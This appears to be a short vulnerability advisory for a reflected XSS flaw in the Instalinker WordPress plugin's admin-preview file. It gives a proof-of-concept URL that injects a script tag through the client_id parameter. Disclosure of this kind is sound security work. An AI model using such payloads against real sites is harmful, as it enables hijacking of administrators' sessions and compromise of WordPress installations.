Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user’s browser and potentially compromise the WordPress installation.
http://www.example.com/wp-content/plugins/instalinker/includes/instalinker-admin-preview.php?client_id=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cdiv%20data-il-client-id=%22